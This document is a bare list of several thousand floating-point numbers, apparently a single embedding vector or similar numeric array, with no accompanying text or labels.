-0.021125826984643936, 0.0132877416908741, 0.001774502219632268, 0.007878453470766544, -0.0123929213732481, -0.007663158234208822, 0.003919042646884918, -0.0066102310083806515, -0.02061450108885765, 0.005715410690754652, -0.018340447917580605, 0.003915678709745407, -0.022875098511576653, -0.004030054435133934, 0.04496975243091583, 0.0013683009892702103, -0.010879128240048885, -0.021529505029320717, 0.016981396824121475, 0.026440924033522606, -0.007414223160594702, 0.004793678876012564, 0.040529292076826096, 0.046961233019828796, 0.005728866904973984, 0.0048811426386237144, -0.011101150885224342, -0.02030501514673233, -0.004921510349959135, 0.015676170587539673, -0.005779326427727938, -0.023897750303149223, -0.043435778468847275, 0.004363088868558407, -0.0060383533127605915, -0.010428354144096375, -0.02209465391933918, -0.025445183739066124, 0.01426329743117094, -0.020466485992074013, 0.011383726261556149, -0.001026856480166316, 0.0119152357801795, -0.007299847900867462, -0.02045303024351597, 0.008457059040665627, -0.015649259090423584, -0.008463786914944649, -0.011901780031621456, 0.02518952079117298, -0.009533533826470375, -0.009432614780962467, 0.006257012486457825, 0.0070441849529743195, -0.0398026742041111, -0.0166853666305542, -0.003908950835466385, -0.02259252406656742, 0.025229888036847115, 0.01591837778687477, 0.011168430559337139, -0.017990592867136, 0.061359088867902756, -0.01795022562146187, -0.03546985983848572, 0.01637588068842888, -0.00838977936655283, 0.017560003325343132, 0.023494072258472443, -0.024866579100489616, -0.0055102077312767506, 0.0068961698561906815, -0.005217541009187698, 0.009102944284677505, 0.005701954942196608, -0.011161702685058117, -0.023534439504146576, -0.02111237123608589, -0.020385749638080597, -0.010556185618042946, 0.005076253786683083, 0.01098677609115839, 0.0044270046055316925, 0.023897750303149223, -0.011128063313663006, 0.01758691482245922, -0.03041042573750019, -0.023615175858139992, 0.013052262365818024, -0.049302566796541214, -0.00006754251808160916, -0.003747479524463415, 0.006761610042303801, 0.00709128100425005, 0.005981165450066328, 0.00979592464864254, -0.005977801512926817, -0.027773061767220497, 0.02580849453806877, -0.0022976018954068422, 0.001380074885673821, 0.007743894122540951, 0.002332923701032996, -0.009573902003467083, -0.000014678013940283563, -0.012601488269865513, 0.0010773162357509136, 0.00635793199762702, -0.015555067919194698, -0.009398974478244781, -0.01024669874459505, -0.02540481649339199, 0.01801750436425209, -0.004625479690730572, -0.008087020367383957, 0.015366684645414352, 0.022659804672002792, 0.010455265641212463, 0.0072594801895320415, -0.0078111737966537476, -0.015164845623075962, 0.0013506400864571333, 0.02936086244881153, -0.042816802859306335, 0.0026710042729973793, -0.01937655545771122, -0.0028762072324752808, 0.003392579033970833, 0.020412662997841835, 0.02938777394592762, 0.02564702369272709, 0.010313978418707848, 0.018219344317913055, -0.004285716917365789, 0.009405702352523804, -0.008652170188724995, 0.01104732695966959, -0.015528155490756035, -0.031352341175079346, -0.0108454879373312, 0.009150039404630661, -0.0033723951783031225, 0.00934515055269003, 0.027234824374318123, 0.024960769340395927, 0.025014594197273254, -0.053662292659282684, -0.003189058043062687, -0.0023800195194780827, 0.0006824684678576887, 0.01189505122601986, -0.0024876671377569437, 0.015878010541200638, -0.006943265441805124, 0.024435987696051598, -0.005903793964534998, -0.048064619302749634, -0.023749735206365585, 0.0182328000664711, -0.014344032853841782, -0.0018182339845225215, -0.031594548374414444, 0.012137258425354958, 0.016052937135100365, -0.009062576107680798, -0.026508202776312828, 0.021744800731539726, -0.00567167904227972, -0.02614489383995533, -0.003035996574908495, -0.006526131182909012, -0.004487556405365467, -0.021408401429653168, 0.025418272241950035, -0.01813860796391964, 0.008450331166386604, -0.03816104680299759, -0.016725733876228333, 0.014478592202067375, 0.03536221385002136, 0.00011773948062909767, 0.009493166580796242, 0.021098915487527847, -0.01780221052467823, 0.009587357752025127, 0.010583097115159035, -0.0333707332611084, 0.013233917765319347, -0.00632092822343111, -0.057429954409599304, 0.010980047285556793, -0.0032327896915376186, 0.0032647475600242615, -0.019766777753829956, 0.015958745032548904, -0.022269582375884056, -0.022336861118674278, -0.003014130750671029, 0.010354346595704556, -0.0028173376340419054, 0.0009595768060535192, 0.014976462349295616, -0.0022976018954068422, -0.010098683647811413, -0.016093304380774498, 0.024893490597605705, -0.02459746040403843, -0.024220693856477737, -0.005281456746160984, -0.009035664610564709, -0.020197367295622826, 0.0067582461051642895, -0.023628631606698036, 0.001575186033733189, -0.010885856114327908, -0.001722360379062593, 0.000583230925258249, 0.030356602743268013, -0.009291327558457851, -0.015810729935765266, -0.007178744301199913, -0.0027332380414009094, -0.01011886727064848, 0.003130188211798668, 0.003814759198576212, -0.0057221390306949615, 0.034501031041145325, 0.007400767412036657, -0.010287066921591759, -0.011706668883562088, 0.03162145987153053, 0.004376544617116451, -0.023803560063242912, -0.023319145664572716, -0.004326085094362497, -0.013328108936548233, -0.00936533510684967, -0.06103614717721939, 0.013381932862102985, 0.017465811222791672, 0.00001432321823813254, -0.003986322320997715, -0.010078500024974346, -0.032617200165987015, 0.0004499330243561417, 0.01591837778687477, 0.001972977304831147, 0.00583315035328269, 0.01992824859917164, 0.04050238057971001, 0.02493385784327984, -0.054092880338430405, 0.01653735153377056, -0.029629981145262718, -0.023063482716679573, -0.02552592009305954, 0.015205212868750095, 0.021677520126104355, -0.0414712093770504, -0.024328341707587242, 0.029307039454579353, 0.015326316468417645, -0.0041175177320837975, -0.016174040734767914, -0.026965705677866936, 0.0030864563304930925, -0.0067582461051642895, -0.006374752148985863, 0.005224268883466721, 0.0050527057610452175, -0.004083877895027399, -0.012433289550244808, 0.036357950419187546, 0.02960306964814663, -0.010811848565936089, 0.032374992966651917, 0.035981185734272, 0.0008056744700297713, 0.0021748163271695375, -0.031782932579517365, -0.018986333161592484, -0.014761166647076607, -0.03668089583516121, 0.007891909219324589, 0.008934744633734226, 0.044942840933799744, -0.013058990240097046, 0.021462226286530495, 0.025162609294056892, -0.007037457078695297, 0.02290201187133789, -0.01616058498620987, -0.007064369041472673, 0.015837641432881355, -0.009614269249141216, 0.023251865059137344, 0.024826209992170334, -0.012150714173913002, 0.008383051492273808, -0.0008973430376499891, 0.01875758171081543, 0.013563588261604309, -0.01446513645350933, 0.014478592202067375, 0.016941029578447342, -0.02831129916012287, -0.020412662997841835, 0.014478592202067375, 0.02064141258597374, -0.022579068318009377, 0.0016777876298874617, -0.0023497436195611954, 0.022242670878767967, -0.01490918267518282, -0.00999776367098093, 0.03022204339504242, -0.02669658698141575, -0.03439338505268097, 0.018004048615694046, -0.06324291974306107, -0.023965030908584595, 0.03167528286576271, -0.012655312195420265, 0.015931833535432816, -0.036761630326509476, 0.006263740360736847, 0.04001796618103981, 0.025969965383410454, -0.0027063260786235332, -0.0189459640532732, 0.030706457793712616, 0.009008752182126045, -0.022444508969783783, -0.0006269627483561635, -0.008504154160618782, 0.0032479276414960623, 0.0005209972150623798, -0.01438440103083849, 0.021946638822555542, 0.06119761988520622, -0.016914118081331253, 0.016093304380774498, 0.008073564618825912, -0.016026025637984276, -0.03756898641586304, 0.009533533826470375, 0.0222830381244421, -0.003195785917341709, 0.03560442104935646, -0.011928691528737545, -0.015904922038316727, -0.01004485972225666, 0.0012001016875728965, 0.05376993864774704, -0.029333950951695442, -0.0037037476431578398, -0.005523663479834795, 0.019228538498282433, 0.025673935189843178, -0.015460875816643238, 0.03059880994260311, 0.0036768359132111073, 0.00017440160445403308, -0.04496975243091583, 0.007057641167193651, -0.009627725929021835, -0.019766777753829956, -0.012729319743812084, 0.029683806002140045, -0.015366684645414352, -0.005540483631193638, 0.03105631098151207, 0.019443834200501442, 0.019645674154162407, -0.02364208735525608, 0.03132542967796326, -0.023319145664572716, -0.017411988228559494, 0.022148478776216507, -0.022753996774554253, -0.005395832471549511, -0.021704431623220444, -0.0428975373506546, 0.005372284445911646, 0.014680431224405766, 0.040529292076826096, -0.004538015928119421, 0.0013876438606530428, 0.015407051891088486, 0.014855358749628067, -0.013126269914209843, 0.017600370571017265, -0.006936537567526102, -0.006724606268107891, 0.02531062439084053, -0.020291559398174286, 0.00570868281647563, -0.011309717781841755, -0.009540261700749397, 0.008631985634565353, 0.018367359414696693, 0.025081872940063477, 0.03372058644890785, -0.020412662997841835, -0.000569354509934783, 0.008275403641164303, 0.05438891425728798, 0.024839667603373528, -0.023036571219563484, -0.012177626602351665, 0.0030746825505048037, -0.010482178069651127, 0.002417023293673992, 0.0035187285393476486, 0.008652170188724995, -0.019120892509818077, 0.023561352863907814, -0.023292234167456627, 0.039695024490356445, -0.01706213317811489, -0.008806913159787655, 0.013758699409663677, -0.009304783307015896, -0.017654193565249443, 0.012211265973746777, -0.01202288269996643, -0.00826867576688528, -0.03398970514535904, -0.012278545647859573, -0.02243105322122574, -0.0166853666305542, -0.012897519394755363, 0.006990361027419567, 0.03291323035955429, -0.00676833838224411, 0.0024674830492585897, 0.011747036129236221, 0.04459298774600029, -0.027638502418994904, -0.011424093507230282, 0.029926013201475143, 0.0047129434533417225, 0.016389336436986923, -0.0002424171834718436, -0.00465911952778697, -0.02533753588795662, 0.009715189225971699, -0.019147804006934166, -0.00863871444016695, 0.029226303100585938, -0.05350081995129585, -0.01426329743117094, 0.021152738481760025, -0.0119152357801795, 0.013139726594090462, 0.0069499933160841465, -0.022135023027658463, -0.018771037459373474, 0.003804667154327035, 0.009324966929852962, -0.018300078809261322, -0.019026700407266617, 0.019295819103717804, 0.07217766344547272, 0.012130530551075935, 0.0027551038656383753, -0.025687390938401222, -0.009970852173864841, 0.013543404638767242, -0.005812966264784336, 0.028096003457903862, -0.017075588926672935, 0.009143311530351639, 0.01118861511349678, -0.02740975096821785, 0.0216909758746624, 0.0182328000664711, 0.006983633153140545, 0.01647007092833519, -0.023749735206365585, -0.004497648216784, 0.036546334624290466, -0.009459526278078556, 0.009829564951360226, -0.012520752847194672, 0.023776646703481674, -0.025660479441285133, 0.019887881353497505, -0.019147804006934166, -0.028688065707683563, -0.02562011033296585, -0.012540936470031738, -0.004635571502149105, 0.027880709618330002, 0.0017728202510625124, -0.0051468973979353905, -0.008705994114279747, 0.017169781029224396, 0.04268224537372589, 0.017317796126008034, 0.005315096583217382, -0.014949549920856953, -0.007622790522873402, 0.0017072224291041493, -0.008524338714778423, -0.02960306964814663, 0.0112626226618886, 0.026198716834187508, -0.01730434037744999, 0.047849323600530624, -0.004218437243252993, -0.05089036747813225, 0.011861411854624748, 0.002676050178706646, -0.010906039737164974, 0.01656426303088665, 0.012076706625521183, -0.0015920059522613883, 0.010085227899253368, 0.012540936470031738, -0.0297914519906044, 0.005977801512926817, -0.025176065042614937, -0.012446745298802853, -0.015232125297188759, -0.0032159697730094194, -0.006411755923181772, 0.0013750289799645543, -0.02111237123608589, -0.041148267686367035, 0.006613594945520163, -0.020843252539634705, 0.014545871876180172, 0.011424093507230282, 0.01804441586136818, -0.008901105262339115, 0.007468047086149454, 0.0201435424387455, 0.025485550984740257, -0.0052444529719650745, -0.004951786249876022, -0.024220693856477737, -0.02481275424361229, 0.006640506908297539, 0.03334382176399231, 0.022579068318009377, 0.013926899060606956, -0.022229213267564774, 0.016833381727337837, -0.020654868334531784, -0.0034749966580420732, -0.0004600249812938273, 0.009466254152357578, -0.015353228896856308, -0.009466254152357578, 0.013482852838933468, 0.03851090371608734, 0.016241321340203285, -0.0007728756172582507, -0.002196682384237647, 0.012076706625521183, -0.0022959199268370867, -0.00115300586912781, -0.002973762806504965, -0.014855358749628067, -0.0074478629976511, -0.0052209049463272095, -0.016362423077225685, 0.013126269914209843, 0.019295819103717804, 0.015743451192975044, -0.01628168858587742, -0.02895718440413475, -0.03409735485911369, -0.032805584371089935, 0.0027197820600122213, 0.0016550807049497962, -0.02104509063065052, 0.002808927558362484, 0.005557303316891193, 0.00253476295620203, -0.015649259090423584, -0.01053600199520588, -0.0047869510017335415, 0.0029771269764751196, 0.015191757120192051, -0.007629518397152424, -0.008571433834731579, 0.008605074137449265, 0.018030960112810135, 0.0056985910050570965, 0.029333950951695442, 0.024220693856477737, 0.022242670878767967, 0.005409288220107555, 0.015164845623075962, -0.0004806293873116374, -0.0076564303599298, -0.03520074114203453, 0.04246694967150688, 0.01844809390604496, 0.005516935605555773, 0.0001576868089614436, 0.008786729536950588, 0.01913434825837612, 0.020654868334531784, 0.009197135455906391, -0.003133552148938179, -0.004945058375597, 0.011033871211111546, 0.012110346928238869, 0.010556185618042946, 0.01706213317811489, 0.0007013909053057432, -0.03401661664247513, 0.02154296077787876, 0.03415117785334587, -0.021529505029320717, 0.019887881353497505, 0.005355464294552803, -0.012830239720642567, 0.02278090827167034, 0.013603956438601017, 0.009715189225971699, 0.03129851818084717, 0.01543396431952715, -0.006862530019134283, -0.002445617225021124, 0.01303880661725998, -0.000469696446089074, -0.04526578634977341, -0.01897287741303444, -0.04082532599568367, 0.021421857178211212, 0.026319820433855057, -0.008100476115942001, 0.02397848665714264, 0.011020415462553501, 0.0074074952863156796, 0.022135023027658463, -0.00477349478751421, 0.029441598802804947, 0.0010007856180891395, 0.010710928589105606, 0.0225252453237772, 0.01198924332857132, -0.0017795481253415346, 0.026925338432192802, -0.015447420068085194, 0.025108786299824715, 0.01792331226170063, -0.022390685975551605, 0.019780233502388, -0.001428852672688663, 0.036546334624290466, -0.018865229561924934, -0.01235928200185299, -0.011551924981176853, -0.02654857188463211, -0.024180324748158455, -0.013873075135052204, -0.00042974911048077047, 0.01925545185804367, -0.001988115254789591, -0.03267102316021919, 0.004453916568309069, 0.018313534557819366, -0.011901780031621456, -0.02623908407986164, -0.00538574019446969, 0.013294469565153122, 0.006209916900843382, 0.0009663047385402024, 0.003841671161353588, 0.03458176925778389, 0.007676614448428154, -0.02936086244881153, -0.009298055432736874, 0.011040599085390568, 0.015568523667752743, -0.005325188394635916, -0.000883887114468962, -0.011861411854624748, -0.032374992966651917, 0.030275866389274597, 0.009129855781793594, 0.007589150685817003, -0.007050912827253342, -0.00594752561300993, 0.030114395543932915, -0.01811169646680355, -0.02543172799050808, -0.005217541009187698, -0.01543396431952715, 0.0026878241915255785, -0.008995296433568, -0.004554836079478264, -0.006125817075371742, 0.0001875421730801463, 0.02181207947432995, 0.004507740028202534, 0.019215082749724388, 0.007952461019158363, 0.000908276007976383, -0.005920614115893841, -0.02104509063065052, -0.022135023027658463, -0.015245581045746803, -0.0002457811788190156, 0.007360399700701237, -0.019524570554494858, -0.017627282068133354, 0.0044034565798938274, -0.011908507905900478, -0.014976462349295616, -0.0016618086956441402, -0.0035019086208194494, -0.017223604023456573, 0.014559327624738216, 0.009076031856238842, 0.0001383438939228654, 0.022700171917676926, -0.01594528928399086, 0.0008426783024333417, -0.007098008878529072, -0.0013968948042020202, 0.003133552148938179, -0.02583540603518486, 0.027988357469439507, -0.0222830381244421, -0.0022202301770448685, -0.0059643457643687725, 0.00854452233761549, 0.01699485257267952, 0.012096891179680824, 0.019860967993736267, 0.008631985634565353, -0.007912092842161655, -0.016322055831551552, 0.0006261217640712857, -0.03485088795423508, 0.016577718779444695, 0.010112139396369457, -0.012446745298802853, 0.042413126677274704, -0.006798614282160997, -0.024705106392502785, 0.01214398629963398, -0.04187488928437233, -0.030733369290828705, 0.003374077146872878, 0.007824629545211792, -0.008046652190387249, 0.010596553795039654, 0.009802652522921562, -0.034070443361997604, -0.005200721323490143, 0.022646348923444748, 0.0032395177986472845, -0.017788752913475037, 0.02614489383995533, -0.006859165616333485, -0.012298730202019215, 0.017748385667800903, 0.021206563338637352, 0.013402117416262627, 0.008732905611395836, -0.015985658392310143, 0.00943934265524149, -0.0005428630975075066, 0.006563134957104921, 0.031567636877298355, 0.0017980501288548112, -0.009452798403799534, -0.0016113489400595427, 0.013132997788488865, -0.02731555886566639, 0.00037108961259946227, -0.0031722381245344877, 0.018475007265806198, -0.01021305937319994, -0.008154300041496754, -0.0004747424100060016, 0.01219108235090971, -0.01291770301759243, -0.026185261085629463, -0.01656426303088665, -0.009170223958790302, 0.01570308208465576, 0.017788752913475037, -0.01001122035086155, 0.0005664110067300498, -0.027019528672099113, 0.021704431623220444, 0.0019258814863860607, 0.030733369290828705, -0.03684236481785774, 0.004675939213484526, -0.019834056496620178, -0.005809602327644825, 0.023386424407362938, -0.005331916734576225, 0.006240192335098982, -0.039076052606105804, 0.0008578162523917854, 0.005342008545994759, -0.01647007092833519, -0.014249841682612896, -0.0004789473896380514, -0.006694330368191004, 0.020574133843183517, 0.014357488602399826, -0.024328341707587242, -0.011814315803349018, 0.04486210644245148, 0.007104736752808094, 0.010024676099419594, 0.01171339675784111, -0.011208798736333847, -0.014747710898518562, 0.029656892642378807, 0.02419378235936165, -0.03250955417752266, 0.0007829675450921059, -0.003160464111715555, 0.003289977554231882, 0.007172016426920891, 0.0022303222212940454, 0.008409962989389896, -0.013503036461770535, 0.005328552331775427, 0.0015802320558577776, -0.029952924698591232, -0.010630193166434765, 0.021489137783646584, -0.007461319211870432, 0.004706215113401413, -0.0001144806228694506, 0.014357488602399826, 0.012776415795087814, -0.009123127907514572, -0.0108454879373312, 0.003231107722967863, -0.006028261501342058, -0.01077148038893938, -0.01490918267518282, 0.019511114805936813, -0.00324119976721704, 0.003076364519074559, -0.011558652855455875, -0.010361074469983578, -0.003565824357792735, -0.029091743752360344, -0.01521866861730814, 0.01606639288365841, 0.021623697131872177, 0.026750409975647926, 0.02552592009305954, 0.03250955417752266, 0.0013876438606530428, 0.021825535222887993, -0.029683806002140045, 0.014707343652844429, 0.03105631098151207, -0.019363099709153175, 0.0034312650095671415, 0.020170455798506737, 0.002676050178706646, -0.001578550087288022, -0.012251634150743484, -0.007602606434375048, 0.019484201446175575, -0.022565612569451332, 0.012810055166482925, -0.01885177381336689, 0.028849536553025246, -0.004625479690730572, -0.0073334877379238605, -0.009446070529520512, -0.009715189225971699, 0.009620998054742813, 0.027154088020324707, 0.009405702352523804, 0.01361068431288004, -0.016954485327005386, 0.011538469232618809, -0.004790314938873053, -0.0001262545702047646, -0.024745475500822067, 0.0024422532878816128, 0.0017795481253415346, -0.00826867576688528, -0.0076564303599298, 0.01570308208465576, 0.009338422678411007, 0.023399880155920982, 0.003935862798243761, 0.011767219752073288, -0.0028762072324752808, -0.023130761459469795, -0.00126485840883106, 0.011242438107728958, 0.02793453261256218, 0.019551482051610947, -0.02104509063065052, 0.00012562381743919104, -0.008208123967051506, -0.01751963421702385, -0.023440249264240265, -0.018676845356822014, 0.0024439352564513683, -0.016577718779444695, -0.000957053794991225, 0.01373851578682661, 0.028714977204799652, 0.006869257893413305, 0.02691188082098961, -0.003818123135715723, -0.022821275517344475, 0.02743666246533394, 0.01706213317811489, -0.027638502418994904, -0.0008351093274541199, 0.0027063260786235332, -0.022727083414793015, 0.020197367295622826, 0.015097565948963165, 0.023251865059137344, 0.010906039737164974, -0.005093073472380638, 0.004716307390481234, -0.00781790167093277, -0.01737161912024021, 0.016052937135100365, -0.000003153736088279402, 0.008780001662671566, 0.002894709352403879, 0.015393596142530441, -0.006741426419466734, -0.013173365965485573, -0.019551482051610947, 0.018744125962257385, -0.0042150733061134815, 0.014074914157390594, 0.009937211871147156, -0.008356139063835144, -0.001456605619750917, 0.008134116418659687, 0.030571896582841873, 0.01053600199520588, 0.017102500423789024, 0.020466485992074013, -0.001156369922682643, -0.007790989708155394, 0.010710928589105606, -0.009856476448476315, 0.005096437409520149, 0.030975576490163803, 0.02271362766623497, -0.007461319211870432, 0.01501682959496975, 0.008463786914944649, -0.016389336436986923, -0.002403567312285304, -0.009775741025805473, 0.010253426618874073, 0.004356360994279385, 0.015460875816643238, -0.009600813500583172, 0.001015923568047583, 0.012130530551075935, 0.010704200714826584, -0.012971526943147182, 0.00040704221464693546, -0.0071181925013661385, -0.01696794107556343, 0.0078111737966537476, -0.0004457280447240919, 0.011861411854624748, -0.01206997875124216, -0.014101825654506683, -0.017169781029224396, -0.001041153445839882, 0.010495633818209171, 0.019215082749724388, -0.0055808513425290585, -0.0283651240170002, -0.01371833123266697, 0.01628168858587742, 0.007266208063811064, 0.0006942424224689603, -0.00849742628633976, -0.008618529886007309, 0.008396507240831852, -0.0103678023442626, -0.010731113143265247, -0.01749272271990776, 0.004077150020748377, -0.0173985306173563, 0.025377904996275902, -0.0021428584586828947, 0.01437094435095787, -0.03059880994260311, 0.0008216534042730927, 0.0015886420151218772, 0.013725060038268566, 0.018030960112810135, -0.0011681438190862536, 0.0014961324632167816, -0.0023901115637272596, -0.00785154104232788, -0.01866338960826397, 0.007172016426920891, -0.006445395760238171, 0.013328108936548233, 0.0006631255964748561, -0.00916349608451128, 0.00030170741956681013, -0.015084109269082546, -0.023911206051707268, -0.02070869319140911, -0.016187496483325958, 0.007905364967882633, -0.002906483132392168, 0.00031684536952525377, 0.01825971156358719, 0.023399880155920982, 0.006751518230885267, 0.018919052556157112, 0.008403235115110874, -0.007098008878529072, 0.006711150519549847, -0.021502593532204628, 0.008033196441829205, -0.006028261501342058, 0.003999778535217047, -0.007387311663478613, -0.012789871543645859, -0.011491373181343079, 0.017317796126008034, -0.011006959713995457, 0.03433956205844879, 0.0070441849529743195, -0.0071181925013661385, 0.011457733809947968, -0.0050325216725468636, -0.012783143669366837, -0.016214407980442047, -0.013529948890209198, 0.015676170587539673, -0.010287066921591759, -0.007979372516274452, 0.0036768359132111073, 0.008961656130850315, 0.01384616270661354, -0.01591837778687477, -0.0058667901903390884, -0.0030780464876443148, -0.013940354809165001, -0.02740975096821785, -0.008046652190387249, 0.009755557402968407, 0.001002467586658895, 0.005725502967834473, 0.0025633566547185183, 0.0016466707456856966, -0.007010545115917921, -0.0029720808379352093, -0.0024691650178283453, 0.03684236481785774, -0.001428852672688663, -0.010495633818209171, -0.006667418871074915, -0.010253426618874073, -0.019390011206269264, -0.007965916767716408, -0.020251190289855003, -0.010408170521259308, -0.010509089566767216, 0.006936537567526102, 0.009748829528689384, 0.010953135788440704, -0.023184586316347122, 0.0036835637874901295, 0.01601256988942623, -0.0036028281319886446, -0.008504154160618782, -0.006653962656855583, 0.018582655116915703, 0.01949765905737877, -0.006532859057188034, 0.007642974145710468, -0.01647007092833519, 0.01961876079440117, 0.02583540603518486, 0.018905596807599068, 0.021838990971446037, -0.00999776367098093, 0.00745459133759141, -0.008934744633734226, -0.017008308321237564, -0.00041377017623744905, -0.01628168858587742, 0.0108454879373312, -0.013745243661105633, -0.00859161838889122, -0.005093073472380638, 0.00252971681766212, -0.00312177836894989, 0.02027810364961624, -0.0036701078061014414, -0.00745459133759141, 0.006627050694078207, 0.017573459073901176, 0.03439338505268097, -0.02011663094162941, 0.005325188394635916, 0.010529274120926857, -0.023103849962353706, 0.003929134923964739, 0.005634675268083811, -0.017694562673568726, 0.006166184786707163, 0.007299847900867462, 0.008457059040665627, -0.022700171917676926, -0.0049551501870155334, 0.013328108936548233, -0.017936769872903824, -0.014021090231835842, 0.014761166647076607, 0.011605748906731606, 0.014599695801734924, 0.0017408623825758696, 0.006468943320214748, -0.010556185618042946, -0.0008014694903977215, 0.006600138731300831, -0.003962774761021137, 0.0029821728821843863, -0.0017509543104097247, 0.014088369905948639, 0.004379908554255962, -0.0034110809210687876, -0.0066640544682741165, -0.008584890514612198, -0.006139272823929787, -0.019390011206269264, -0.00999776367098093, -0.00831577181816101, -0.004386636894196272, -0.001697971485555172, -0.007461319211870432, 0.020749060437083244, -0.016483526676893234, 0.00894820038229227, 0.004413548391312361, -0.013778883032500744, -0.040529292076826096, -0.018676845356822014, -0.0021983643528074026, -0.01930927485227585, -0.0033808050211519003, -0.01622786372900009, -0.004642299376428127, 0.00967482104897499, -0.002112582791596651, -0.015729995444417, 0.0055068437941372395, 0.0029350770637392998, -0.013745243661105633, -0.005193992983549833, -0.006690966431051493, 0.00502242986112833, -0.016429703682661057, 0.01897287741303444, -0.003525456413626671, -0.0005575805553235114, 0.004682667553424835, 0.02225612662732601, -0.0032041959930211306, 0.006051809526979923, -0.0005865949206054211, -0.013146454468369484, 0.005439564120024443, 0.015057197771966457, -0.017075588926672935, -0.005853334441781044, -0.005079617723822594, -0.015999114140868187, -0.0028274294454604387, -0.008282131515443325, -0.0039695026353001595, 0.010865672491490841, -0.006008077412843704, 0.01930927485227585, 0.010327434167265892, -0.000018791011825669557, -0.0021394945215433836, -0.0005058592651039362, -0.004662483464926481, -0.015931833535432816, 0.009789196774363518, 0.020251190289855003, -0.003098230343312025, 0.015339772216975689, 0.012675495818257332, -0.008954928256571293, 0.01887868531048298, 0.004154521506279707, 0.0020873527973890305, -0.025472095236182213, 0.01625477708876133, -0.009829564951360226, 0.0034783605951815844, -0.010784936137497425, 0.010475450195372105, 0.010670561343431473, -0.013772155158221722, -0.0148957259953022, -0.006001349538564682, 0.008100476115942001, -0.014747710898518562, -0.021987007930874825, 0.0182328000664711, 0.0020352110732346773, 0.01878449320793152, -0.011733580380678177, 0.02045303024351597, -0.004517832305282354, -0.014868814498186111, -0.025606654584407806, -0.0204933974891901, -0.005991257727146149, -0.00453465199097991, 0.015622347593307495, -0.015124477446079254, -0.012325641699135303, -0.000691719469614327, -0.005197356920689344, -0.014599695801734924, 0.008517610840499401, 0.00006491439853562042, 0.011323174461722374, 0.004040146246552467, -0.004460644442588091, 0.01904015615582466, 0.02218884602189064, 0.00025313987862318754, -0.012857151217758656, -0.01121552661061287, -0.0026323185302317142, -0.012285273522138596, -0.015797274187207222, 0.009957396425306797, -0.02685805782675743, 0.010085227899253368, -0.006690966431051493, -0.014855358749628067, -0.01980714499950409, -0.009614269249141216, 0.013819251209497452, -0.01311954203993082, 0.014626607298851013, -0.014357488602399826, -0.003740751650184393, 0.028472770005464554, -0.0017526362789794803, -0.020412662997841835, -0.006193096749484539, -0.0003849660570267588, 0.0037743914872407913, -0.014761166647076607, -0.007165288552641869, 0.028015268966555595, -0.03127160668373108, 0.011545197106897831, -0.015272492542862892, -0.010556185618042946, -0.029226303100585938, 0.00948643870651722, 0.029872188344597816, 0.010004491545259953, -0.012534208595752716, 0.0016651726327836514, -0.00680534215644002, -0.0038921309169381857, -0.0060383533127605915, -0.008800185285508633, -0.0011790768476203084, 0.004487556405365467, 0.017223604023456573, -0.013577044010162354, -0.0011715078726410866, 0.004514467902481556, -0.008288859389722347, -0.00489796232432127, 0.005981165450066328, -0.006361295934766531, -0.002919939113780856, -0.014545871876180172, -0.011652844958007336, 0.018178975209593773, -0.016483526676893234, 0.00902220793068409, 0.01863647811114788, -0.0009982625488191843, 0.014411312527954578, 0.0114981010556221, -0.0016786286141723394, -0.01940346695482731, -0.023965030908584595, -0.01937655545771122, -0.010098683647811413, 0.0031722381245344877, -0.01007177121937275, 0.010872400365769863, 0.017775297164916992, 0.0020940806716680527, -0.024960769340395927, -0.027799973264336586, -0.010172691196203232, 0.0024708472192287445, 0.013637595809996128, -0.011430821381509304, 0.009769013151526451, -0.01146446168422699, 0.0007644656579941511, 0.003824851242825389, -0.031190870329737663, -0.004124246072024107, -0.0022925559896975756, 0.006001349538564682, -0.005819694604724646, -0.015649259090423584, 0.026898425072431564, 0.009614269249141216, -0.001972977304831147, -0.005008974112570286, -0.002521306974813342, -0.009991035796701908, -0.013355021364986897, 0.024247605353593826, 0.007737165782600641, 0.020654868334531784, 0.007326759863644838, -0.021408401429653168, 0.015272492542862892, -0.010179419070482254, -0.013556860387325287, 0.009291327558457851, -0.02221575751900673, 0.012722591869533062, -0.01625477708876133, 0.03350529074668884, 0.0010310615180060267, 0.029495421797037125, 0.013873075135052204, 0.0039493185468018055, -0.0019376554992049932, 0.020897075533866882, -0.016819925978779793, 0.010650376789271832, -0.005352100357413292, -0.007346943486481905, -0.005025793798267841, 0.022646348923444748, -0.010529274120926857, 0.013361749239265919, -0.011780676431953907, -0.006889441516250372, -0.01925545185804367, 0.008557978086173534, -0.0025902686174958944, 0.0042352573946118355, 0.0035961002577096224, 0.008430146612226963, 0.018649933859705925, -0.01319354958832264, -0.026091068983078003, -0.01324064563959837, -0.004100698046386242, 0.005913885775953531, 0.0025936325546354055, -0.0026844602543860674, 0.006751518230885267, -0.006294016260653734, 0.018367359414696693, -0.009089487604796886, -0.001784594147466123, -0.027032984420657158, -0.005096437409520149, -0.011800860054790974, -0.00594752561300993, 0.009197135455906391, 0.023965030908584595, 0.010287066921591759, -0.026925338432192802, 0.012460201047360897, 0.004733127076178789, -0.00530836870893836, -0.02095090039074421, 0.012076706625521183, 0.003730659605935216, 0.00526127265766263, -0.012460201047360897, -0.018865229561924934, -0.0345548577606678, -0.025848861783742905, -0.0031671919859945774, 0.023749735206365585, -0.004564927890896797, -0.0037676633801311255, 0.03587353974580765, 0.010657104663550854, -0.011121335439383984, -0.01072438433766365, -0.030114395543932915, 0.023009657859802246, -0.008396507240831852, -0.004834046587347984, 0.03162145987153053, -0.029737628996372223, -0.00429580919444561, -0.007286392152309418, 0.00891456101089716, 0.01321373414248228, 0.015393596142530441, -0.01742544397711754, -0.027665413916110992, -0.01437094435095787, -0.010549457743763924, 0.0032647475600242615, 0.005237725097686052, -0.020062807947397232, -0.0025852227117866278, -0.00829558726400137, -0.007932277396321297, 0.0003035996633116156, -0.012729319743812084, 0.0031100043561309576, -0.02052030898630619, -0.0033808050211519003, -0.011551924981176853, -0.000666910083964467, -0.03320926055312157, -0.004753311164677143, 0.012123802676796913, -0.0014439906226471066, 0.00611908920109272, 0.006852437742054462, 0.005042613949626684, 0.0004553995095193386, 0.003757571568712592, -0.02549900859594345, -0.0028593873139470816, -0.013341565616428852, 0.04392018914222717, 0.0024187052622437477, 0.0027551038656383753, -0.002115946728736162, 0.008753089234232903, 0.005331916734576225, -0.012197810225188732, -0.015837641432881355, -0.00916349608451128, -0.007515143137425184, -0.010078500024974346, 0.0015348182059824467, 0.004854230675846338, 0.018152063712477684, -0.017344707623124123, -0.008120660670101643, 0.020439574494957924, 0.01296479906886816, -0.01851537451148033, -0.011733580380678177, 0.01543396431952715, -0.003042724682018161, 